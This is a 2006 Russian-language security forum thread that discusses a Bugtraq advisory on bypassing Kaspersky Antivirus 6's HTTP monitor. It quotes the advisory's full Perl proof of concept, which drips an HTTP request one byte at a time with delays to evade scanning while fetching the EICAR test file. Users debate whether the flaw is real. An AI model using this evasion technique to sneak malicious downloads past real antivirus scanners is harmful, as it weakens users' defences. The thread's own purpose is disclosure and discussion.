nobody@nowhere

Kaspersky antivirus 6: HTTP monitor bypassing

В этой теме 84 сообщений

http://www.securityfocus.com/archive/1/434827 :

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Поделиться сообщением

Блин, не успели зарелизить, уже уязвимость нашли ...

Поделиться сообщением

Интересно посмотреть, насколько быстро запатчат... Надеюсь, что запатчат.

Поделиться сообщением

john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

Поделиться сообщением

john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

Linux популярнее © ROC FAQ

Поделиться сообщением

ну можно вспомнить певицу Мадонну, она то точно популярнее и известнее Линукса..

А можно блендер с мотоциклом сравнивать..и там и там мотор есть.

Добавлено спустя 7 минут 54 секунды:

вдруг кто не сходит ссылке не почитает..

BugTraq

Back to list | Post reply

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

john kak-sam to

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Solution:

There is no known solution.

Exploit code:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;

use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',

'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,

PeerPort => $h_port,

Proto => 'tcp' );

die "socket: $!" unless $s;

sendthem( $s,

"GET $h_url HTTP/1.1",

"Host: $h_srv",

""

);

my $doc = read_body( $s, read_headers( $s ) );

syswrite STDOUT,

'document is <'.$doc.'> len='.length($doc)."n";

sub sendthem {

my $s = shift;

my $c = 0;

foreach( @_ ) {

my @a = split //, $_;

++$c;

syswrite STDOUT, "query $c: ";

foreach( @a ) {

sendone( $s, $_ );

}

sendone( $s, "r" );

sendone( $s, "n" );

}

}

sub sendone {

my( $s, $v ) = @_;

$s->syswrite( $v );

syswrite STDOUT, $v;

# !!! comment next line to have monitoring working ;)

select( undef, undef, undef, 0.300 );

}

sub read_headers {

my( $s ) = @_;

my( $c, $cl ) = ( 0, 0 );

for( ;; ) {

my $l = read_line( $s );

++$c;

syswrite STDOUT, "header $c: $l";

syswrite STDOUT, "rn";

last if not $l and $c;

$cl = $1 if $l =~ /^Content-Length:s+(d+)/;

}

$cl;

}

sub read_line {

my( $s ) = @_;

my $str = '';

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

die 'EOF reading headers!' unless $r;

last if $v eq "n";

next if $v eq "r";

$str .= $v;

}

return $str;

}

sub read_body {

my( $s, $cl ) = @_;

my( $str, $cli ) = ( '', $cl );

syswrite STDOUT, "reading body <content-length: $cli> ...n";

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

last unless $r;

$str .= $v;

--$cl if $cli;

last if not $cl and $cli;

}

return $str;

}

Добавлено спустя 1 минуту 18 секунд:

Кстати, это ещё не уязвимость и даже не кандидат в уязвимости.. Просто сообщение некого

john kak-sam to

Поделиться сообщением

Этот некто создал этот топик Ж) Война прожолжается...

Поделиться сообщением

чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

Поделиться сообщением

чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

Поделиться сообщением

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

ну и тест, теста (vir2.gif)

пусть все остальные мониторы выключены (vir3.gif)

А вот с ssl не так всё просто :(

vir.gif

vir2.gif

vir3.gif

post-36-1148455993.gif

post-1-1148455993.gif

post-1-1148455994.gif

Поделиться сообщением

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

тест чего и на что?

Поделиться сообщением

Ответ разработчика ЛК читайте здесь: http://forum.kaspersky.com/index.php?showt...st&p=120245.

А вот с ssl не так всё просто

Проверка ссл-трафика веб-антивирусом появится в MP1 (уже добавлена в бетах).

Поделиться сообщением

тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

Поделиться сообщением

тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

а. осталось троянописателей убедить запускать IE для качанья, они люди злобные и подстраиваться так что бы KAV им не давал качать не будут. ;) было бы не смешно, а просто печально если бы под IE оно тоже пропускало вирусы.

Добавлено спустя 6 минут 48 секунд:

читайте интерью Данилова - "поделия ученика 11 класса", ну и все отсюда вытекающее.

Поделиться сообщением

дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

vir4.gif

post-36-1148459453.gif

Поделиться сообщением

На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

Поделиться сообщением

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

линк на что?

проходят. но монитор их не видит.

Поделиться сообщением

Сергей Ильин

дыра ли это..и вообще.. подождём что напишут на www.securityfocus.com

Господин утверждает, что веб-антивирус в принципе не работает.

линк на что?
интерью Данилова - "поделия ученика 11 класса

Поделиться сообщением

На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

нет. дырки в IE эксплуатируются в полный рост. в iframe, рендеринг картинок - впомните как специальные bmp роняли всю винду. да и просто вредоносный javascript. браузер ничего из этого на диск записывать не будет, он мило отработает. даже если запись в кэш будет остановлена - поздно уже.

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

каков уровень авторов и их знания технологии таков и результат

Поделиться сообщением

javascript

с файловой системой напрямую не работает.

Добавлено спустя 8 минут 38 секунд:

есть одно замечаение, www.securityfocus.com принадлежит конкуренту каспера - семантику. Мне кажется, если, указанная выше, уязвимость была очень серьёзной, то семантик бы первый крикнул.. типа ВОТ ВАМ..

хотя с другой стороны, кто его знает.. что там в голове у семантика :))))

Поделиться сообщением

Я запустил зловещий скрипт, долго смотрел на приведённый ниже алерт, задавая себе вопрос "А где прикол?"... И потом до меня вдруг дошло! Ну конечно же! john, я наконец-то всё понял! Ведь это же алерт Анти-Хакера! То есть фаервола! То есть такой штуки, которой в Dr.Web, как бы это сказать, нету... Именно поэтому вы не учли, что такой алерт появится, если вы вместо стандартного браузера или даунлоадера (для защиты которых создан компонент Web-Antivirus в КИС 6) используете ваш самописный скрипт, запущенный на компе клиента. Что ж, не страшно, с кем не бывает...

Вот на всякий случай, может понадобится кому...=) http://exler.ru/expromt/12-01-2005.htm

ah1.JPG

post-198-1148463281.jpg

Поделиться сообщением

Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Поделиться сообщением

Прояснится только то, что в моём длинном посте про Dr.Web больше правды, чем кажется на первый взгляд =) Держите линк: http://inesp.ru/download/Interview.rar

Поделиться сообщением

Сергей Ильин

это извращённый реверсивный троян. Как я уже не раз писал, в скрипте нет особой уязвимости и тем более угрозы.

ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

НЕЛЬЗЯ.

Поделиться сообщением

Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Угу, я вам больше скажу. Я подозреваю, что и в КАВ без антихакера эту уязвимость нельзя будет использовать, ибо сработает файловый монитор, когда eicar будет закачан на комп. Давайте так... Чтобы не быть голословным, я вечером это проверю и выложу скриншоты (в том числе и на форуме ЛК, чтобы народ зря не пугался). Просто в универе я это проверить не могу, так как даже если я жму "Разрешить" в антихакере, eicar блокируется внешним фаерволлом универа =(

Ну а пока я проверяю, пусть нам john кинет линк на инет-магазин, где можно купить веб-антивирус производства Dr.Web, который конечно же будет нас защищать от этого зловреда...=)))))) Ведь раз 11-классники уже написали свой Веб-АВ, то у НАСТОЯЩИХ СПЕЦИАЛИСТОВ непременно найдётся гораздо более надёжная защита, правда?

Поделиться сообщением

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти с помощью Facebook Войти Войти с помощью Twitter
Anti-Malware.ru Вконтакте   Anti-Malware.ru в Facebook   Anti-Malware.ru в Twitter   Anti-Malware.ru в LinkedIn   RSS
    • Sergey22101979s
      Площадку надо свою делать и развивать её. А потом продавать места на ней. И не важно какую площадку - сайт, группу в соцсети, или что-то тому подобное.
    • homeobed
      На дому за копейки работать - дело нехитрое) Вот чтобы зарабатывать приличные деньги, на одних комментариях далеко не уедешь)
    • Mike
      Вышел McAfee VirusScan Enterprise 8.8.0 Patch 10  
    • Wenderoy
      Да, лучше удалить. Но это, разумеется, решает администрация... Я никакой не тролль, ANDYBOND прекрасно это понимает, просто именно с ним был разлад безо всякой причины, подробности приводить не буду, но теперь он старается как можно больше "навредить" мне. Собственно, вот отзывы про PS - https://www.mywot.com/ru/scorecard/provisionsecurity.ru Думаю, комментарии будут излишними. Есть очень много свидетелей, которых "примерная" администрация Provisionsecurity даже "поливала" нецензурной лексикой, у меня есть все скриншоты и т. д. И после всего этого надо подумать, а стоит ли верить таким людям? Это я в качестве отступления. Главное - то, что я устал здесь распинаться, тратя свое личное время, что идет только на руку уже упомянутым участниками форума. Все, что мне надо было доказать, я доказал, пользователи моего приложения знают и понимают мои цели и стремления, я ни от кого ничего не скрываю. Поэтому программу уже используют многие, а это значит, что дело поставлено на рельсы. Самое смешное, что на каждый мой аргумент, который я не поленился снабдить всей необходимой информацией в форме ссылок, скриншотов, записей, копий писем, сообщений лабораторий etc, в ответ мне летят одни и те же фразы: "мошенник", "вирусописатель", "тролль". Так кто же больше попадает под значение последнего слова? Просто упомяну еще пару вещей. Когда я объяснял, почему продукт детектит пустой файл, все равно меня никто не слышал. Каким же, интересно, образом мне следует растолковать это? Были приведены доказательства, что я часть баз собираю с ресурса VirusShare (благо, имеются очень хорошие источники самой разнообразной информации), где AVP в свое время почему-то пометил файл как Trojan... (где-то на предыдущих страницах все чрезвычайно подробно описано). Так вот, копируя MD5, в комплект попала и хеш-сумма пустого файла, вследствие чего как бы Вы его ни переименовывали, все рано будет сработка продукта (кстати, ее уже нет). Далее. Насчет "мошенник" и "вирусописатель". Если зимние переписки (не просто отчетов автоматического анализа лабораторий) с вирусным аналитиком McAfee ни о чем Вам не говорят, это, как говорится, не мои проблемы. Другие вендоры, да практически все (даже популярные Avast, Qihoo и др.) устанавливаются втихомолку вместе с другим ПО (DRP Solutions, различные дополнения для монетизации в пакеты дистрибутивов), но их Вы почему-то "вирусописателями"  не называете. И последнее. Насчет "мошенник". Я никого не принуждаю устанавливать KAR, каждый делает это добровольно. Лицензионное соглашение и Privacy Statment присутствуют на сайте, там все четко и ясно описано. На сервер высылаются исключительно анонимные отчеты, как и в любых других разработках аналогичного типа, не более того.  Kuranin Anti-Ransomware распространяется абсолютно бесплатно, никакой рекламы ни в продукте, ни даже на сайте, т. к. это мое хобби. Поэтому здесь не вижу ничего, связанного с мошенничеством. Это очень краткое обобщение, все мои подробные ночные отписки на однотипные бессмысленные сообщения можно посмотреть, листая предыдущие ни много ни мало двенадцать страниц. @VMS, радует, что еще есть адекватные люди, которые умеют слушать. Да, к сожалению, это не те времена, когда жизнь кипела в каждом уголке Anti-Malware и других подобных форумов. Обидно, что перевились разработчики-добровольцы, которые были очень активны в 2004-2014 годах. Сейчас в основном крупные компании все вытеснили, да есть те, кто просто сдался (Александр Калинин, его судьба мне не известна, но смею предположить, что он воплотил свое хобби в жизнь; Kerish, который, правда, стал чрезвычайно полезной утилитой Kerish Doctor, а ведь совсем немногие знают прошлое этого творения; ScreamAV, бесплатныq антивирус то ли из Индонезии, то ли с Филиппин; путем долгого анализа удалось выяснить, что создатели данного антивируса примкнули к проекту SmadAV;  SMK антивирус, когда-то известный в узких кругах; "Зоркий глаз" Петелина Александра;  AWS Core, приостановивший свое развитие и т. п.) Вообще обожаю древние сайты, особенно варианты на narod.ru и им подобные, пропахшие стариной и историей. Очень приятные ощущения, как будто бы открыл давно забытую, но вновь найденную на чердаке книгу с пожелтевшими от времени листами.  А еще очень много полезных ресурсов, которых уже нет, но они сохранились в "архиве". Все это "богатство" сложно отыскать, но зато там есть чрезвычайно много полезной информации... Вот, кстати, один из примеров: https://web.archive.org/web/20040905203536/http://www.winchanger.narod.ru:80/ Или https://web.archive.org/web/20070624081145/http://winchanger.whatis.ru:80/ Как бонус прилагаю собственную коллекцию малоизвестных продуктов любителей информационной безопасности, среди них, кстати, все вышеупомянутые образцы! https://mega.nz/#!tZBkkCKa!0WzfYt4A1zK4aCvVLtu3FLt7pfPIp7wWtyPIr9c-cbo Может, кому пригодится...
    • AM_Bot
      На вопросы Anti-Malware.ru любезно согласился ответить Дмитрий Мананников, бизнес-консультант по безопасности. Это интервью продолжает цикл публикаций «Индустрия в лицах». Читать далее